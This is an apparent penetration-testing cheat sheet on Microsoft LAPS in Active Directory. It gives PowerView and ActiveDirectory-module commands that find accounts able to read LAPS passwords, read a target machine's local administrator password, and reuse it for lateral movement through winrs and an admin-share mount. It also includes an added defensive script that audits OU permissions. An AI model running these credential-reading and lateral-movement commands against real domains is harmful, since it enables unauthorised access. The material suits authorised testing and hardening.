LAPS

LAPS provides centralized storage of local user passwords and rotates them periodically. It helps mitigate lateral movement by preventing the same local password from being reused across machines.

PowerShell

[!INFO] Remember to follow the PowerShell methodology

Check if the ms-Mcs-AdmPwd attribute is visible with PowerView (the query lists computers that have ms-Mcs-AdmPwdExpirationTime set):

Get-DomainComputer | Where-object -property ms-Mcs-AdmPwdExpirationTime | select-object samaccountname

PowerView

Find users who can read LAPS:

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'msLAPS-Password') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

In Legacy Microsoft LAPS, the attribute would be ms-Mcs-AdmPwd in place of msLAPS-Password.

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}
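The same ACL review from the defender's side, as an added example that is not part of the original notes: it uses the RSAT ActiveDirectory module to report every principal outside an allow-list that can read the LAPS attributes on each OU. The `$Approved` list is a hypothetical placeholder; ACEs granting all extended rights are also reported, because confidential attributes such as ms-Mcs-AdmPwd are readable with that right.

```powershell
# Added example: list principals able to read LAPS passwords via OU ACLs.
# Needs the RSAT ActiveDirectory module. $Approved is a hypothetical allow-list.
Import-Module ActiveDirectory

$Approved = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')  # assumption: extend per domain
$LapsAttributes = @('ms-Mcs-AdmPwd', 'msLAPS-Password')         # attribute names from the notes above

# Map each attribute's schemaIDGUID to its name; attributes missing from the schema are skipped.
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$lapsGuids = @{}
foreach ($name in $LapsAttributes) {
    $attr = Get-ADObject -SearchBase $schemaNC -LDAPFilter "(lDAPDisplayName=$name)" -Properties schemaIDGUID
    if ($attr) { $lapsGuids[[guid]$attr.schemaIDGUID] = $name }
}

$adRights = [System.DirectoryServices.ActiveDirectoryRights]
$findings = foreach ($ou in Get-ADOrganizationalUnit -Filter *) {
    $acl = Get-Acl -Path "AD:\$($ou.DistinguishedName)"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($Approved -contains $ace.IdentityReference.Value) { continue }

        $rights   = $ace.ActiveDirectoryRights
        $canRead  = $rights.HasFlag($adRights::ReadProperty)
        $extended = $rights.HasFlag($adRights::ExtendedRight)   # also set by GenericAll

        if ($lapsGuids.ContainsKey($ace.ObjectType) -and ($canRead -or $extended)) {
            $scope = $lapsGuids[$ace.ObjectType]      # ACE names the LAPS attribute directly
        } elseif ($ace.ObjectType -eq [guid]::Empty -and $extended) {
            $scope = 'All extended rights'            # covers confidential attributes too
        } else { continue }

        [pscustomobject]@{
            OU        = $ou.DistinguishedName
            Identity  = $ace.IdentityReference.Value
            Rights    = $rights
            Scope     = $scope
            Inherited = $ace.IsInherited
        }
    }
}
$findings | Sort-Object OU, Identity | Format-Table -AutoSize -Wrap
```

Any identity in the output that is not a designated LAPS reader group is a candidate for ACL cleanup.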

Read LAPS credential using PowerView:

Get-DomainObject -Identity <targetmachine$> | select -ExpandProperty msLAPS-Password
Get-DomainObject -Identity <targetmachine$> | select -ExpandProperty ms-mcs-admpwd

Read LAPS credential using ADModule:

Get-ADComputer -Identity <targetmachine$> -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd

With the creds, you can then do:

winrs -r:<target-machine$> -u:.\Administrator -p:'$ubscr1beTo0xd4y' hostname
net use x: \\<target-machine$>\C$\Users\Public /user:notes\Administrator '$ubscr1beTo0xd4y'
